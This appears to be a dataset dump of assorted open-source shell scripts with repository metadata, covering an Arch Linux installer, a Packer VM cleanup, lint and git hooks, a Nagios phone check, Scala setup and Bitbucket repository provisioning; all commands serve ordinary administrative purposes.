/localdisk/home/bjackso4/programs/shapeit-2.12/bin/shapeit -assemble \
--input-vcf /localdisk/home/bjackso4/mice_LD/Mmd/VCF/${CHR}.recoded.vcf.gz \
--input-pir /localdisk/home/bjackso4/mice_LD/Mmd/1_extract_PIRs_out/PIRs_${CHR}.txt \
-O ../2_run_SHAPEIT_out/haplotypes_${CHR} \
--thread 4
| true
|
6b6aa0a1839f19153b531c2de59b3d60e1b47ca0
|
Shell
|
hengyang-zhao/nidus
|
/assets/exec/perm-stack
|
UTF-8
| 517
| 3.8125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -euo pipefail
DIR=${1:-$(pwd)}
if [ "${DIR:0:1}" != / ]; then
DIR="$(pwd)/$DIR"
fi
while :; do
perm="$(stat -c %A "$DIR" 2>/dev/null)"
if [ -z "$perm" ]; then
perm="??????????"
fi
dev="$(df -P "$DIR" 2>/dev/null | tail -1 | cut -d' ' -f1)"
if [ -z "$dev" ]; then
dev="??????????"
fi
echo "$(tput setaf 3)$perm$(tput sgr0) $(tput setaf 2)$dev$(tput sgr0) $DIR"
if [ "$DIR" = / ]; then
break;
fi
DIR="$(dirname "$DIR")"
done
| true
|
fa60ac0c460bea93d960ab3db5ec71a4b0a35d47
|
Shell
|
davo/Lona
|
/config/pre-commit-swiftlint.sh
|
UTF-8
| 986
| 3.96875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
cd studio
# Path to swiftlint when in the studio
SWIFT_LINT=./Pods/SwiftLint/swiftlint
if [[ -e "${SWIFT_LINT}" ]]; then
count=0
for file_path in $@; do
export SCRIPT_INPUT_FILE_$count="$file_path"
count=$((count + 1))
done
##### Make the count avilable as global variable #####
export SCRIPT_INPUT_FILE_COUNT=$count
echo "${SCRIPT_INPUT_FILE_COUNT}"
##### Lint files or exit if no files found for lintint #####
if [ "$count" -ne 0 ]; then
echo "Found lintable files! Linting..."
$SWIFT_LINT lint --use-script-input-files --config .swiftlint.yml
else
echo "No files to lint!"
exit 0
fi
RESULT=$?
if [ $RESULT -eq 0 ]; then
:
else
echo ""
echo "Violation found of the type ERROR! Must fix before commit!"
fi
exit $RESULT
else
echo "warning: SwiftLint not installed, please run `cd studio && bundle && bundle exec pod install`"
fi
| true
|
67f3ae6b54b0c8cb7e13be3f5588f0aa2de5ddd7
|
Shell
|
gladiopeace/qubes-updates-cache
|
/install
|
UTF-8
| 226
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/sh
set -ex
id=vm-updates
getent passwd $id >/dev/null ||
useradd --shell /bin/false --home / --system --user-group $id
install -d -m 750 -o $id -g $id "$DESTDIR"/var/lib/qubes/$id
umask 022
cp -R etc usr "$DESTDIR"/
| true
|
c5a8415c7a5f7a3c484879a2a97d605ef023a173
|
Shell
|
SMALLIKA-ECU/CSP2101
|
/scratch/exam.sh
|
UTF-8
| 210
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
case $1 in
"HD") echo "High Distinction";;
"D") echo "Distinction";;
"CR") echo "Credit";;
"C") echo "Pass";;
"N") echo "Fail";;
*) echo "Unknown Grade";;
esac
exit
| true
|
2a146c8a0acac7812c2190fa72130c28b267ef1d
|
Shell
|
ozio/react-intl-google-docs
|
/push.sh
|
UTF-8
| 464
| 3.671875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
function ask_yes_or_no() {
read -p "$1 (y/N): "
case $(echo $REPLY | tr '[A-Z]' '[a-z]') in
y|yes) echo "yes" ;;
*) echo "no" ;;
esac
}
node --no-warnings ./
git --no-pager diff translations
if [[ "no" == $(ask_yes_or_no "Push this changes to repository?") ]]
then
git checkout translations/*
echo "Skipped."
exit 0
fi
now=$(date)
git add translations
git commit -m "$now Translation updates"
git push origin master
| true
|
8a3e34ca3aca2823ce1bd94528b1bff3c702d3ed
|
Shell
|
samdoran/packer-rhel7
|
/scripts/cleanup.sh
|
UTF-8
| 631
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# Remove Ansible and its dependencies.
yum -C -y autoremove ansible
yum -C -y remove kernel-firmware 'iwl*'
# Delete old kernels
package-cleanup -C -y --oldkernels --count=1
# Clean yum cache
echo "Cleaning up extra files"
rm -rf /var/cache/yum/*
rm -rf /usr/share/man/*
rm -rf /usr/share/info/*
rm -rf /usr/share/doc/*
rm -rf /usr/share/backgrounds/*
rpm --rebuilddb
# Zero out the rest of the free space using dd, then delete the written file.
echo "Reclaming free space on disk"
dd if=/dev/zero of=/EMPTY bs=1M
rm -f /EMPTY
# Add `sync` so Packer doesn't quit too early, before the large file is deleted.
sync
| true
|
55930579d7622e61ede9b26a569863ca146ec782
|
Shell
|
equk/i5700
|
/dalvik-cache/system/sd/userinit.sh
|
UTF-8
| 579
| 2.703125
| 3
|
[] |
no_license
|
#!/system/bin/sh
#
# Move dalvik-cache to /cache
#
# Remove Debugger Mem Dumps
if [ ! -d /cache/dalvik-cache ]
then
busybox rm -rf /cache/dalvik-cache /data/dalvik-cache
mkdir /cache/dalvik-cache /data/dalvik-cache
fi
busybox chown 1000:1000 /cache/dalvik-cache
busybox chmod 0771 /cache/dalvik-cache
# bind mount dalvik-cache so we can still boot without the sdcard
busybox mount -o bind /cache/dalvik-cache /data/dalvik-cache
busybox chown 1000:1000 /data/dalvik-cache
busybox chmod 0771 /data/dalvik-cache
# remove debugger memory dumps
busybox rm -rf /data/tombstones/*
| true
|
fec106f497761f7fb3f74a502e764ea1df46483b
|
Shell
|
pct/arch
|
/install.sh
|
UTF-8
| 12,173
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
###############################################################################
#
# This programm should help you install arch linux on your pc (version 4444)
# Copyright (C) Vienna 2012 by Mario Aichinger
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
###############################################################################
function ask_select()
{
echo $1
select menu_item in $2; do
[ -n "$menu_item" ] && break
done
}
function sh_contact()
{
echo "";
echo "Thank you for using!";
echo "If you have any feedback, wishes or errors please email me";
echo "at arch@mario-aichinger.at";
echo "Also feel free to leaf a comment on bbs.archlinux.org/viewtopic.php?id=146450";
echo "";
echo "Happy hacking";
echo "Mario";
echo "";
}
function ask_for_keyboard()
{
ask_select "Select keyboardlayout:" "de en es fr us other"
if [ "$menu_item" == "other" ]; then
read -p "Other? :" menu_item;
fi
loadkeys $menu_item;
kbl=$menu_item;
unset menu_item;
}
function ask_use_fdisk()
{
while [ 1 ]; do
read -p "Use automatic patition [y/n]: " usefdisk;
if [[ "$usefdisk" =~ ^[Yy]$ ]] || [[ "$usefdisk" =~ ^[Nn]$ ]]; then
break;
fi
done
}
function config_fdisk()
{
if [[ "$usefdisk" =~ ^[Yy]$ ]]; then
fdiskconfok="n";
while [[ ! "$fdiskconfok" =~ ^[Yy]$ ]]; do
read -p "Select device (default is [sda]): " device;
read -p "Bootsize (default is 100M) [100[K/M/G]]: " bootsize;
read -p "Swapsize (default is 1024M) [100[K/M/G]]: " swapsize;
read -p "Use separat home partition (default is no)[y/n]: " usesephome;
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
read -p "size for / (default is 3000M) [3000[K/M/G]]: " rootsize;
if [ -z "$rootsize" ]; then
rootsize="3000M";
fi
fi
if [ -z "$bootsize" ]; then
bootsize="100M";
fi
if [ -z "$swapsize" ]; then
swapsize="1024M";
fi
if [ -z "$device" ]; then
device="sda";
fi
show_partition_config;
read -p "Config ok [y/n]? :" fdiskconfok;
done
else
wait_for_usr "Continue?"
fi
}
function show_partition_config()
{
echo "Device is $device";
echo "Size of /boot is $bootsize";
echo "Size of swap is $swapsize";
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
echo "Size of / is $rootsize";
echo "Using separat /home: Yes";
else
echo "Using separat /home: No";
fi
}
function set_fs(){
#set_fs "home" "ext3"
read -p "Set filesystem for /$1 (default is $2): " fs;
if [ -z "$fs" ]; then
fs=$2
fi
if [ -z "$1" ]; then
eval "rootfs=$fs"
else
eval "$1"'fs='"$fs"
fi
}
function wait_for_usr()
{
read -p "$1" a;
unset a;
}
function ask_bootloader()
{
ask_select "Select bootloader" "GRUB SYSLINUX NONE";
bootloader=$menu_item;
unset menu_item;
}
function ask_network_if(){
ifs=""
for i in `cat /proc/net/dev | grep ':' | cut -d ':' -f 1`; do
ifs="$ifs $i";
done
ask_select "network" "$ifs"
network_if=$menu_item;
unset menu_item;
}
function ask_network_method()
{
ask_select "Set network method" "dhcpcd manual";
nw_method=$menu_item;
unset menu_item;
if [ "$nw_method" == "manual" ]; then
ask_for_manual_network_data;
fi
}
function ask_for_manual_network_data()
{
while [ 1 ]; do
while [ 1 ]; do
read -p "IP (like 192.168.0.100): " ipaddress;
if [ "$ipaddress" ]; then
break;
fi
done
while [ 1 ]; do
read -p "Subnetmask (eg: 255.255.255.0): " subnetmask;
if [ "$subnetmask" ]; then
break;
fi
done
while [ 1 ]; do
read -p "Gateway (eg: 192.168.0.1): " gateway;
if [ "$gateway" ]; then
break;
fi
done
while [ 1 ]; do
read -p "Broadcast (like 192.168.0.255)" broadcast;
if [ "$broadcast" ]; then
break;
fi
done
while [ 1 ]; do
read -p "DNS-Server (eg: 8.8.8.8 (google)): " dnsserver;
if [ "$dnsserver" ]; then
break;
fi
done
echo "";
echo "IP: $ipaddress";
echo "Subnetmask: $subnetmask";
echo "Gateway: $gateway";
echo "Broadcast: $broadcast";
echo "DNS: $dnsserver";
read -p "Configuration ok[Y/n]: " ipconfigok
if [[ "$ipconfigok" =~ ^[Yy]$ ]]; then
break;
fi
done
}
function ask_custom_mirror()
{
while [ 1 ]; do
read -p "Use custom mirror? [y/n]: " usecmirror
if [[ "$usecmirror" =~ ^[Yy]$ ]] || [[ "$usecmirror" =~ ^[Nn]$ ]]; then
if [[ "$usecmirror" =~ ^[Yy]$ ]]; then
read -p "Enter the mirrors URL: " custom_mirror;
fi
break
fi
done
}
function ask_base_devel()
{
while [ 1 ]; do
read -p "Install base-devel? [y/n]: " installbasedevel
if [[ "$installbasedevel" =~ ^[Yy]$ ]] || [[ "$installbasedevel" =~ ^[Nn]$ ]]; then
break
fi
done
}
function ask_add_packages()
{
read -p "Enter additional packages (separated by [space]): " addPac;
}
function ask_for_localdomain()
{
read -p "Enter the localdomain [localdomain]: " localedomain;
if [ -z "$localdomain" ]; then
localdomain="localdomain";
fi
}
function ask_for_hostname()
{
while [ 1 ]; do
read -p "Enter the new hostname: " hostname;
if [ $hostname ]; then
break;
fi
done
}
function ask_for_zone()
{
first_zones=$(ls -1 /usr/share/zoneinfo);
ask_select "Select Zone: " "$first_zones";
zone=$menu_item;
zone_path="/usr/share/zoneinfo/$zone";
if [ -d "/usr/share/zoneinfo/$zone" ]; then
second_zones=$(ls -1 /usr/share/zoneinfo/$zone)
ask_select "Select SubZone: " "$second_zones"
subzone=$menu_item;
zone_path="/usr/share/zoneinfo/$zone/$subzone"
fi
unset menu_item;
}
function ask_locale()
{
ask_select "Locale: " "de_DE.UTF-8 en_US.UTF-8 es_ES.UTF-8 other";
locale=$menu_item;
if [ "$locale" == "other" ]; then
read -p "Locale: " locale;
fi
}
function ask_for_root_password()
{
while [ 1 ]; do
stty -echo
read -p "Password: " passwd1; echo
read -p "Password: " passwd2; echo
stty echo
if [ "$passwd1" == "$passwd2" ]; then
break;
else
echo "Passwords do not match. Please try again.";
fi
done
}
function ask_for_manual_partition()
{
echo "plase use an other terminal to patition [alt]+[F2-F6]";
wait_for_usr
}
function start_partition()
{
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
fdisk /dev/$device << EOF
d
1
d
2
d
3
d
4
n
p
1
+$bootsize
n
p
2
+$swapsize
n
p
3
+$rootsize
n
p
a
1
t
2
82
p
w
EOF
else
fdisk /dev/$device << EOF
d
1
d
2
d
#3
d
4
n
p
1
+$bootsize
n
p
2
+$swapsize
n
p
3
a
1
t
2
82
p
w
EOF
fi
}
function do_partition(){
if [[ "$usefdisk" =~ ^[Yy]$ ]]; then
start_partition
else
ask_for_manual_partition
fi
}
function do_formating()
{
mkfs -t "$bootfs" /dev/"$device"1;
mkswap /dev/"$device"2
mkfs -t "$rootfs" /dev/"$device"3;
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
mkfs -t "$homefs" /dev/"$device"4;
fi
}
function do_mount()
{
mount /dev/"$device"3 /mnt;
mkdir /mnt/boot;
mount /dev/"$device"1 /mnt/boot;
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
mkdir /mnt/home;
mount /dev/"$device"4 /mnt/home;
fi
}
function do_network()
{
if [ "$nw_method" == "dhcpcd" ]; then
dhcpcd "$network_if";
else
ifconfig "$network_if" address "$ipaddress" netmask "$subnetmask"
ip route add default via "$gateway";
ip link set "$network_if" up
cp /etc/resolv.conf /etc/resolv.conf_bak
sed "s!# /etc/resolv.conf.tail can replace this line!nameserver $dnsserver\n#/etc/resolv.conf.tail can replace this line!g" /etc/resolv.conf_bak >/etc/resolv.conf
fi
# else
# read -p "IP (like 192.168.0.100/24): " ipaddress;
# read -p "Gateway (like 192.168.0.1): " gateway;
# ip addr add $ipaddress dev "$network_if";
# ip route add default via "$gateway";
# ip "$network_if" up
# fi
}
function install_base_system()
{
if [[ "$usecmirror" =~ ^[Yy]$ ]]; then
echo "Please configure now the file /etc/pacman.d/mirrorlist in an other terminal [alt]+[F2-F6]!"
wait_for_usr "Continue?"
fi
}
function install_base_devel()
{
if [[ "$installbasedevel" =~ [Yy] ]]; then
pacstrap /mnt base base-devel
else
pacstrap /mnt base
fi
}
function install_bootloader()
{
if [ "$bootloader" == "GRUB" ]; then
echo "Install grub-bios"
pacstrap /mnt grub-bios
elif [ "$bootloader" == "SYSLINUX" ]; then
echo "Install syslinux";
pacstrap /mnt syslinux
fi
}
function install_add_packages()
{
if [ "$addPac" ]; then
pacstrap /mnt "$addPac"
fi
}
function gen_fstab()
{
genfstab -p /mnt >> /mnt/etc/fstab
}
function mk_locale_conf()
{
touch locale.conf_new
echo 'LANG="'"$locale"'"' > locale.conf_new;
cp locale.conf_new /mnt/etc/locale.conf
rm locale.conf_new
}
function chroot_into_new_system()
{
arch-chroot /mnt << EOF
echo "setting network"
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# interface=/interface=$network_if/g" /etc/rc.conf_bak >/etc/rc.conf
if [ "$nw_method" == "manual" ]; then
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# address=/address=$ipaddress/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# netmask=/netmask=$subnetmask/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# gateway=/gateway=$gateway/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/rc.conf /etc/rc.conf_bak
sed "s/# broadcast=/broadcast=$broadcast/g" /etc/rc.conf_bak >/etc/rc.conf
cp /etc/resolv.conf /etc/resolv.conf_bak
sed "s!# /etc/resolv.conf.tail can replace this line!nameserver $dnsserver\n# /etc/resolv.conf.tail can replace this line!g" /etc/resolv.conf_bak >/etc/resolv.conf
rm /etc/resolv.conf_bak
fi
rm /etc/rc.conf_bak
echo "Setting hostname...";
cp /etc/hosts /etc/hosts_bak
sed "s/# End of file/127.0.0.1 $hostname.$localdomain $hostname\n\n#End of file/g" /etc/hosts_bak >/etc/hosts
cp /etc/hosts /etc/hosts_bak
sed "s/# End of file/::1 $hostname.$localdomain $hostname\n\n#End of file/g" /etc/hosts_bak >/etc/hosts
rm /etc/hosts_bak
echo "$hostname" > /etc/hostname
echo "Setting zoneinfo...";
ln -s $zone_parh /etc/localtime
echo "setting up locale...";
locale -a
cp /etc/locale.gen /etc/locale.gen_bak
sed 's/#$locale/$locale/g' /etc/locale.gen_bak >/etc/locale.gen
rm /etc/locale.gen_bak
locale-gen
if [ $kbl ]; then
echo "Saving keyboardlayout...";
echo "KEYMAP=$kbl" >/etc/vconsole.conf
echo "FONT=lat9w-16" >>/etc/vconsole.conf
echo "FONT_MAP=8859-1_to_uni" >>/etc/vconsole.conf
fi
echo "mkinitcpio -p linux..."
mkinitcpio -p linux
echo "Starting dm-mod...";
if [ "$bootloader" == "GRUB" ]; then
modprobe dm-mod
echo "Install and configure GRUB..."
grub-install --recheck --debug /dev/"$device"
mkdir -p /boot/grub/locale
cp /usr/share/locale/en\@quot/LC_MESSAGES/grub.mo /boot/grub/locale/en.mo
grub-mkconfig -o /boot/grub/grub.cfg
elif [ "$bootloader" == "SYSLINUX" ]; then
echo "Install syslinux";
/usr/sbin/syslinux-install_update -iam
fi
passwd << EOPF
$passwd1
$passwd2
EOPF
clear
exit
EOF
}
function unmount()
{
umount /mnt/boot
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
umount /mnt/home
fi
umount /mnt
}
ask_for_keyboard
ask_use_fdisk
config_fdisk
set_fs "boot" "ext2"
set_fs "" "ext3"
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
set_fs "home" "ext3"
fi
#############################################################################
#
# starting install procedure
#
#sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
ask_bootloader
ask_network_method
ask_network_if
ask_custom_mirror
ask_base_devel
ask_add_packages
ask_for_zone
ask_for_hostname
ask_for_localdomain
ask_locale
ask_for_root_password
do_partition
do_formating
do_mount
do_network
install_base_system
install_base_devel
install_bootloader
install_add_packages
gen_fstab
mk_locale_conf
chroot_into_new_system
unmount
sh_contact
| true
|
b31af16a82114bfbc85d318e6d0b5bec4f7bddb4
|
Shell
|
mjmunger/nagios-asterisk-plugin
|
/check_phone.sh
|
UTF-8
| 1,353
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
DEBUG=0
if [ "$#" -eq 0 ]; then
MSG="You must pass an extension as an argument to check its status! Config fail."
echo $MSG
logger $MSG
exit 2
fi
if ["$DEBUG" == 1 ]; then
logger Checking status of SIP $1
fi
LINE=`asterisk -rx' sip show peers' | grep "^$1"`
if ["$DEBUG" == 1 ]; then
logger LINE: "$LINE"
fi
# Figure out the column count, and adjust the target column accordingly:
LASTCOL=`echo $LINE | awk '{print $NF}'`
case $LASTCOL in
"ms)")
COLUMN=`echo $LINE | awk '{ print $(NF-2) }'`
;;
"UNKNOWN")
echo "Phone appears to be offline or lagged"
logger "exiting status 2 (Critical) for SIP $1"
exit 2
;;
"Unmonitored")
echo "This peer is unmonitored. Try setting keepalive."
exit 1
;;
esac
if ["$DEBUG" == 1 ]; then
logger "$COLUMN"
fi
if [ "$COLUMN" == "OK" ]; then
logger "SIP $1 OK, getting ping"
#Split the line on "OK" to get the ping.
PART2=`asterisk -rx"sip show peers" | grep $1 | awk -F "OK" '{ print $2 }'`
logger SIP ping=$PART2
STATUS="$PART1 $PART2"
logger SIP $1 $STATUS
echo "OK $STATUS"
logger "exiting status 0 (OK)"
exit 0
else
echo $PART1
echo "Phone appears to be offline or lagged"
logger "exiting status 2 (Critical) for SIP $1"
exit 2
fi
| true
|
1942c8bde2447f2dd55f1654c1636f0dea271313
|
Shell
|
alessandroleite/vagrant-mesos-spark
|
/scripts/setup-scala.sh
|
UTF-8
| 806
| 3.671875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source "/vagrant/scripts/common.sh"
#http://scala-lang.org/download/install.html
function setupEnvVars {
echo "creating scala environment variables"
cp -f $SCALA_RES_DIR/scala.sh /etc/profile.d/scala.sh
}
function installScala {
echo "install scala"
FILE=/vagrant/resources/$SCALA_ARCHIVE
if resourceExists $SCALA_ARCHIVE; then
echo "install scale from local file"
else
curl -o $FILE -O -L $SCALA_MIRROR_DOWNLOAD
fi
tar -xzf $FILE -C /usr/lib
ln -s /usr/lib/$SCALA_VERSION /usr/lib/scala
# install sbt http://www.scala-sbt.org/release/tutorial/Installing-sbt-on-Linux.html
echo "deb http://dl.bintray.com/sbt/debian /" | sudo tee -a /etc/apt/sources.list.d/sbt.list
apt-get update -y
apt-get install -y sbt --force-yes
}
echo "setup scala"
installScala
setupEnvVars
| true
|
6a3e7e10554ec1443f415c77f0aac5fae6708163
|
Shell
|
lastmansleeping/TableLingo
|
/evaluate.sh
|
UTF-8
| 559
| 2.9375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
MODELS_DIR="models"
DART_TARGET="data/dart/tgt"
DART_DEPTH="data/dart/depth"
for MODEL in bart t5 robertashare
do
for VERSION in v0 v1 v2
do
for SPLIT in dev test
do
if [ -f "${MODELS_DIR}/${MODEL}_${VERSION}/pred/${SPLIT}.txt" ]; then
python pipeline/evaluate.py \
--pred "${MODELS_DIR}/${MODEL}_${VERSION}/pred/${SPLIT}.txt" \
--ref "${DART_TARGET}/${SPLIT}.txt" \
--depth "${DART_DEPTH}/${SPLIT}.txt"
else
echo "!!! ${MODELS_DIR}/${MODEL}_${VERSION}/pred/${SPLIT}.txt does not exist !!!"
fi
done
done
done
| true
|
f396a2d7eface3fcd0b0f94f2027a5ad8ccfc6db
|
Shell
|
TianhaoFu/paraflow
|
/paraflow-1.0-alpha1/sbin/logclean.sh
|
UTF-8
| 842
| 3.578125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
PREFIX="dbiir"
START=2
END=9
PARAFLOW_HOME="/home/iir/opt/paraflow"
PARAFLOW_DIR="/home/iir/opt/paraflow-1.0-alpha1"
# deployment
deploy()
{
if [ $(id -u) != "0" ]; then
echo "please run $0 $1 in root."
exit 0
fi
for ((i=$START; i<=$END; i++))
do
if [ $i -lt 10 ]; then
echo "init the logclc.sh on dbiir0$i"
scp $PARAFLOW_DIR"/sbin/paraflow_logclean.sh" $PREFIX"0"$i:$PARAFLOW_DIR"/sbin/"
ssh $PREFIX"0"$i "chown -R iir:iir $PARAFLOW_DIR"
fi
done
}
# start
startup()
{
for ((i=$START; i<=$END; i++))
do
ssh $PREFIX"0"$i "$PARAFLOW_DIR/sbin/paraflow_logclean.sh"
echo "0$i clean have finished,content: the log produced by paraflow"
done
}
if [ "$1" == "deploy" ]; then
deploy
elif [ "$1" == "start" ]; then
startup
# nothing
else
echo "Usage: $0 deploy|start"
fi
| true
|
f7260cf0fedc9031c4132d9abec393be03903c26
|
Shell
|
rtauxerre/iptv
|
/package/build.sh
|
UTF-8
| 309
| 3.296875
| 3
|
[] |
no_license
|
#! /bin/sh
# Remove previous packages
rm -fv iptv*.deb
# Build the package
fakeroot dpkg-deb --build iptv
# Get the version number of the package
VERSION=$(cat iptv/DEBIAN/control | grep Version | awk '{print $2}')
# Rename the package to include the version number
mv -fv iptv.deb iptv_${VERSION}.deb
| true
|
2cf778c58863c9d7846d016cde9a14e975338f92
|
Shell
|
BIX-Digital/ods-contrib
|
/pipeline/provision-repository.sh
|
UTF-8
| 5,035
| 4.15625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -ue
set -o pipefail
##################################################
## This script can be used to create an empty
## repository, setup with webhooks.
###################################################
BITBUCKET_URL=""
COMPONENT_ID=""
PROJECT_ID=""
TEMPLATE_URL=""
function usage {
printf "Usage:\n"
printf "\t--help|-h\t\t\tPrints the usage\n"
printf "\t-v|--verbose\tVerbose output\n"
printf "\t--bitbucket\tBitbucket URL, e.g. 'https://bitbucket.example.com'\n"
printf "\t--project\tProject ID of the Bitbucket Project\n"
printf "\t--component\tComponent ID of the project, usually is equivalent to bitbucket repo name\n"
printf "\t--template\tTemplate URL to use for new repository (must be a .tgz file like https://github.com/bix-digital/ods-pipeline-examples/tarball/jupyter-lab)\n"
}
while [[ "$#" -gt 0 ]]; do case $1 in
-v|--verbose) set -x;;
-h|--help) usage; exit 0;;
--bitbucket=*) BITBUCKET_URL="${1#*=}";;
--bitbucket) BITBUCKET_URL="$2"; shift;;
--project) PROJECT_ID="$2"; shift;;
--project=*) PROJECT_ID="${1#*=}";;
--component) COMPONENT_ID="$2"; shift;;
--component=*) COMPONENT_ID="${1#*=}";;
--template) TEMPLATE_URL="$2"; shift;;
--template=*) TEMPLATE_URL="${1#*=}";;
*) echo "Unknown parameter passed: $1"; exit 1;;
esac; shift; done
#############
##### Check required parameters
#############
if [ -z ${PROJECT_ID} ]; then
echo "Param --project is missing."; usage; exit 1;
elif [ -z ${COMPONENT_ID} ]; then
echo "Param --component is missing."; usage; exit 1;
fi
#############
##### Set variables
#############
# Project name is all lowercase
PROJECT_ID=$(echo "${PROJECT_ID}" | tr '[:upper:]' '[:lower:]')
# Component name is all lowercase
COMPONENT_ID=$(echo "${COMPONENT_ID}" | tr '[:upper:]' '[:lower:]')
# Bitbucket repository is all lowercase
BITBUCKET_REPO_NAME=$(echo "${PROJECT_ID}-${COMPONENT_ID}" | tr '[:upper:]' '[:lower:]')
# Bitbucket project is all uppercase
BITBUCKET_PROJECT=$(echo "${PROJECT_ID}" | tr '[:lower:]' '[:upper:]')
# OpenShift project is all lowercase
OPENSHIFT_CD_PROJECT=$(echo "$PROJECT_ID-cd" | tr '[:upper:]' '[:lower:]')
#############
##### Checks
#############
echo "Performing checks ..."
command -v git &> /dev/null || (echo "You need to install 'git' to use this script." && exit 1)
if [ -d "${BITBUCKET_REPO_NAME}" ]; then
echo "Directory ${BITBUCKET_REPO_NAME} already exists in working directory."; exit 1;
fi
command -v oc &> /dev/null || (echo "You need to install 'oc' to use this script." && exit 1)
oc whoami > /dev/null || (echo "Please log into OpenShift using 'oc login'." && exit 1)
#############
##### Execute
#############
echo "Pulling info from OpenShift ..."
webhookURL=$(oc -n "${OPENSHIFT_CD_PROJECT}" get routes/ods-pipeline --template 'http{{if .spec.tls}}s{{end}}://{{.spec.host}}/bitbucket')
webhookSecret=$(oc -n "${OPENSHIFT_CD_PROJECT}" get secret/ods-bitbucket-webhook -o=jsonpath='{.data.secret}' | base64 --decode)
echo "Please enter a Bitbucket access token with admin permissions:"
read -s BITBUCKET_TOKEN
basicAuthHeader="Authorization: Bearer ${BITBUCKET_TOKEN}"
echo "Creating Bitbucket repository ..."
curl -sS -X POST "$BITBUCKET_URL/rest/api/1.0/projects/$BITBUCKET_PROJECT/repos" \
-H "${basicAuthHeader}" \
-H "Content-Type: application/json" \
-d '{"name": "'"$BITBUCKET_REPO_NAME"'"}'
echo ""
echo "Configuring repository webhook ..."
curl -sS -X POST "$BITBUCKET_URL/rest/api/1.0/projects/$BITBUCKET_PROJECT/repos/$BITBUCKET_REPO_NAME/webhooks" \
-H "${basicAuthHeader}" \
-H "Content-Type: application/json" \
-d '{
"name": "ODS Pipeline",
"events": [
"repo:refs_changed"
],
"configuration": {
"secret": "'"$webhookSecret"'"
},
"url": "'"$webhookURL"'",
"active": true
}
'
echo ""
echo "Cloning created repository ..."
git clone "${BITBUCKET_URL}/scm/${BITBUCKET_PROJECT}/${BITBUCKET_REPO_NAME}.git"
if [ -n "${TEMPLATE_URL}" ]; then
command -v tar &> /dev/null || (echo "You need to install 'tar' to populate from template." && exit 1)
echo "Populating repository with template ..."
cd "${BITBUCKET_REPO_NAME}"
curl -L "${TEMPLATE_URL}" | tar -xz
shopt -s dotglob
mv */* .
command -v sed &> /dev/null || (echo "You need to install 'sed' to manipulate the template." && exit 1)
echo "Replacing @project@ and @component@ in template ..."
if [ -f ods.yaml ]; then
sed -i '' "s/@project@/${PROJECT_ID}/" ods.yaml
sed -i '' "s/@component@/${COMPONENT_ID}/" ods.yaml
fi
if [ -f ods.yml ]; then
sed -i '' "s/@project@/${PROJECT_ID}/" ods.yaml
sed -i '' "s/@component@/${COMPONENT_ID}/" ods.yaml
fi
if [ -f chart/Chart.yaml ]; then
sed -i '' "s/@project@/${PROJECT_ID}/" chart/Chart.yaml
sed -i '' "s/@component@/${COMPONENT_ID}/" chart/Chart.yaml
fi
echo ""
echo "Repository has been populated from the template in your working copy."
echo "Adjust and commit the files as needed."
fi
echo ""
echo "Done"
| true
|
a68abe03c62bf631e2bf6deba935e0831048e685
|
Shell
|
peterklipfel/firesuit
|
/aws.sh
|
UTF-8
| 972
| 2.78125
| 3
|
[] |
no_license
|
codename=`cat /etc/lsb-release | grep CODENAME | cut -f2 -d'='`
sudo apt-get -y install software-properties-common
sudo add-apt-repository ppa:juju/stable
sudo apt-get update
sudo apt-get -y install juju-core lxc mongodb-server
echo "preparing orchsetration environment"
sed s/notsosecret/`tr -dc "[:alpha:]" < /dev/urandom | head -c 30`/ aws.yaml > tmp.yaml
sed s/notsounique/`tr -dc "[:alpha:]" < /dev/urandom | head -c 30`/ tmp.yaml > uniquified.yaml
rm tmp.yaml
echo "Type your amazon access key, followed by [ENTER]:"
read access_key
echo "Type your amazon secret key, followed by [ENTER]:"
read secret_key
sed s/youraccesskey/$access_key/ uniquified.yaml > tmp.yaml
sed s/yoursecretkey/$secret_key/ tmp.yaml > environments.yaml
rm tmp.yaml
rm uniquified.yaml
mkdir ~/.juju
mv environments.yaml ~/.juju/environments.yaml
echo "setting up firesuit"
sudo ln -s `pwd`/lib/firesuit /usr/bin/firesuit
echo "generating ssh keys"
ssh-keygen -t rsa -C "firesuit@master"
| true
|
b1c8efff18a77061f3b2354e24b9840252968972
|
Shell
|
MorrellLAB/sequence_handling
|
/SlurmJobScripts/Genotype_GVCFs.job
|
UTF-8
| 643
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# This script is for submitting a job to Slurm via sbatch
set -e
set -o pipefail
# Required input arguments
CONFIG=$1
SEQUENCE_HANDLING=$2
GG_MEM=$3
